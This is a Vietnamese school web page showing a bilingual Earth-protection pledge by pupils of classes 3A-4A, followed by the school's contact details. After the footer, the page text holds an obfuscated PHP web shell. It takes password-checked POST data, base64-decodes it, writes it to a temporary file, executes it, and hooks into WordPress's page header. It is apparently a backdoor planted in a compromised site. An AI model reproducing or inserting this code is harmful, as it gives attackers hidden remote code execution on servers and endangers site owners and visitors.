Chủ đề: Cứu mẹ Trái đất – Môi trường sống lành mạnh

3/5 - (2 bình chọn)

BÀI DỰ THI SỐ 5: BÀI THUYẾT TRÌNH CỦA HỌC SINH LỚP 3A-4A
Chủ đề: Cứu mẹ Trái đất – Môi trường sống lành mạnh
Kính mời các quý Phụ huynh, các thầy cô hãy thả tim, comment và chia sẻ video thuyết trình tuyệt vời này của các em học sinh lớp 3A-4A để lan tỏa thông điệp về bảo vệ môi trường mà các em muốn gửi tới tất cả chúng ta nhé ạ!
Trái đất là một hành tinh sống tuyệt đẹp trong vũ trụ và môi trường sống chung của hàng triệu loài đa dạng sinh học. Trái đất của chúng ta cung cấp thức ăn và nơi trú ẩn cho chúng ta . Chúng ta không thể trả hết lòng tốt của mẹ Trái đất với chúng ta. Đúng hơn là con người đang tàn nhẫn với Trái đất của chúng ta bằng những hoạt động ích kỷ của mình. Vì sự bền vững của hành tinh chúng ta, tôi hứa sẽ hoàn thành trách nhiệm của tôi đối với mẹ thiên nhiên
với tư cách là một công dân toàn cầu để bảo vệ cuộc sống của tôi, bảo vệ hành tinh khỏi sự suy thoái, trả lại hành tinh xanh cho thế hệ tương lai của chúng ta.
Saving Mother Earth: Healthy Habitats
Earth is a beautiful living planet in the Universe and the common habitat of millions of species of biodiversity. Our Earth provides us with food and shelter. We are not able to pay off her kindness to us. Rather we humans are being cruel to our Earth with our selfish activities. For the sustainability of our planet, I promise to fulfill my responsibilities towards Mother Nature as a global citizen so as to protect my living planet from deterioration & to handover clean & green planet to our future generations.

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@eraschool.edu.vn

0899 889 818

eraschool.edu.vn

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}